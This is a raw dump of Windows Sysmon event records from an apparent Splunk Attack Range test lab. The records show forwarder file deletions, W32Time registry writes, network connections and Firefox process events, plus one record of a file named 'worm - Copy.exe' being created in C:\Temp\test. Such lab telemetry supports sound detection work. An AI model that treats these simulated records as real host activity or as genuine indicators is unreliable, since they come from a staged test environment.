Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AEE706635B746021A5B11074BD3AD04,SHA256=E56A9E4D878F91050E2316E9D359947F7CFDDC8340459371F72B58386A000C99,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:56.807{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C6C33FA01323DD8C8557859326A4B2,SHA256=D26627BB3EDB1E7D977E9A9DF3CF6A0579CD992553800AEC5CA7FC5D676D895A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000809683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:03:56.498{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f4-0x769f99f9) 23542300x8000000000000000809682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:56.389{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06970DD7520CDD894F5A46F9D270FEB2,SHA256=067EC3E3CDEB590365BAC82AC60B97C523D7E9DAB55B7E6076C7497BF1849C37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:56.725{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=E747D09FC4640EA6371929B491482828,SHA256=7243104DF508A1B1A80997DDC3121C7553B52140AD693367390E6AEA79DB6128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:57.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=447A9BA6288B307071A79E09C14BE413,SHA256=046D353137A4B7FC0309745AD6D721384096E561C10BCD0D4632A21A539BFEF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:57.404{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE5123E487AA24E4A60851134B3DB7E,SHA256=917E33143094B36329CC0BD31857DF595C61E2A10B092DB965EE0E4474008018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:57.271{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:58.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E2A898BEEF8F462D0EC2AB232C994EE,SHA256=B4F5E8A6B2CEFBAA2460825F34ECB9778ABF46C6AECB7B6F0B75A69A2F18C140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:58.407{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E7C448728C51975093D8DAB8562E22E,SHA256=B385336F3B67CE7A968B28203BD89927291194E6C8E068F5B5FDCB8D4E4B9C59,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.802{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61912-false10.0.1.12-8089- 354300x8000000000000000809685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:56.365{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57414-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:59.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E43F874BCDF6966BF54B13169817A2FA,SHA256=45F979C1C90DDD85BEA818EB3771DDF312E0AF6E26DC74A61703153DBE79FBA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:59.433{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57B5268DBD8639D939789988CFB822CD,SHA256=B4D26068CFA1AB69A3726999DEBCCD5C86E5690D0C552F69307147270C383D5D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001053224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001053223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f7409aa) 13241300x80000000000000001053222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x16372aec) 13241300x80000000000000001053221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x77fb92ec) 13241300x80000000000000001053220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0xd9bffaec) 13241300x80000000000000001053219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001053218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f7409aa) 13241300x80000000000000001053217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0x16372aec) 13241300x80000000000000001053216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f4-0x77fb92ec) 13241300x80000000000000001053215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:59.655{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0xd9bffaec) 354300x80000000000000001053227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.632{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61913-false10.0.1.12-8000- 23542300x80000000000000001053226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:00.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1BCCCBC33397EC189B372988046CFBA,SHA256=713267FC53AEE264AD59555098E7D51B92C1315583CDED8E0A434FA94A494C28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:00.483{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0311B14AF25CFDB040F861E595B54BA6,SHA256=601F1F7F3F8ADD918555AE9A5E0230928BF8E9E3D0D8CD849E0A251BA3308DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:01.826{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04586F174720D64E15DC5247DE95273A,SHA256=227E42A7B45E9345566CB5135B117B3D8559D51896EBF25A48516C0D7492ED0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:01.483{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEFDEB36C28EEF3A9DFB1E217C2EB74,SHA256=205AE89D3357B05DF6D9002EB2784EAA20FDFC78E37ADD285B8A27BE0FB4FD55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:02.841{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD6D3ECE26D5EC00532DC9C09A56F826,SHA256=8554A501B12E1556721980793AE21300D7140287B6DF7D8EEC1E190CE4873EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:02.561{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B21751F79439A2DEC4515FB5E8B9382B,SHA256=DC30D2A3FB6D8874ACC13ED3BF652A1FA1281451906418B9210AE1CA9C198F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:03.686{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573C8DD2DAE79C7F5A425FC01C70F358,SHA256=322A177FCECD9E38712C1DDE1DEEA294C9F639919CAF2A9B93BD6E29F88A23B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:03.842{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC3AAEDCA997547D2EE85F88D9B11E7C,SHA256=A5E32A48007B3089B8364442FF842321E2D45F56594E7826783181E2D1A91573,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:03.726{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\ws.ps1@2021-07-12_080356MD5=18A58B95BCD2C567D4D33DEA9FBD5E42,SHA256=2408F4FCCD3F8ED61F480A51B7BEFC39A450BF0E6F1EB675F47B5BEDCBF955FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:02.193{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57415-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.857{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08335DBFDA3E36CEC639FA61D8F8C02B,SHA256=97A00028676A797F9EDE373F96DC7281BA7E1DDE7E415FD9CA8DBFCD304B0ED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:04.717{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF179746358A301C419D342FF928C37F,SHA256=CF61FBBBF3C5F783AF5F852F274D5CFF4E9D8115AE60D63EF959AA7C7F2BFC34,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:05.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CF1A21CF6E1D0ACAD7847A0472C5C9,SHA256=3CE644420E6163FCC677AEB7519F92203396C248527F99F8CD3FD9D3E5CD6382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:05.733{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BA836D2909548B53DFB44075EFA7CD3,SHA256=EC9004CC943EA59EC0537C2D494F6EDB17153485A098856D8A4991A2FA6335B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9563F36E651DB4B4A6EEB51F427A8EC7,SHA256=C6D7EAA52A8947DCD4E9AD25C4651660E0ED62778C95AE86B4D360D7190C2040,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:06.732{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69BF6898CB82A0612975097479507FB,SHA256=265E4F28FD42826943829B01E42F93460A9AE87316670C7CF978ED41B535BFA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.468{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\cache2\indexMD5=50E635DAE2039958C6B8CAA9685626C0,SHA256=693C2B523705EA402F8C588B0CCAD9A84F5581A264D6DE61A3D6BDB8A29964A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.452{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.399{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla 
Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001053237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.399{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla 
Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001053236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:04:06.399{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1216.169459107C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001053235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:04:06.399{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1216.169459107C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001053234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:06.252{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=1FF55831369444D538ED0D3C320D39C0,SHA256=B523D53F3DB5B8D638F39D73591247CC5553487E2D63197D79D27641C55A1CEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:07.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3370AB61502411B23837BBDCB0D61F,SHA256=D95AE3841719D2E2B8EE308530CA5B1206795019B6841560587C5AF27184529D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:07.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA880371290062FE547DCAB50BC08B7F,SHA256=306A76D30FD344F7BDE06FEB98E009FF56D7A21BA9ECF3E9CDE9E820F9018649,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:58.660{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61914-false10.0.1.12-8000- 11241100x80000000000000001053242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 08:04:07.185{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\worm - Copy.exe2021-07-12 08:04:07.185 23542300x80000000000000001053245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:08.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA71E2D98733D9085B24C5A90D5C8B6,SHA256=FC00C5B3162366EE28E6CEA12BBF6B21BD83AF7CC5DD622527BAC8F8BE45C16F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:08.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ECF1212BCE4E694F252F5BCC4A31EE1,SHA256=980FF6DD0DDFE2FB31DFE60F696A7D6D6E34D7550783EDBE2AFCAA674CEC1497,IMPHASH=00000000000000000000000000000000falsetrue 
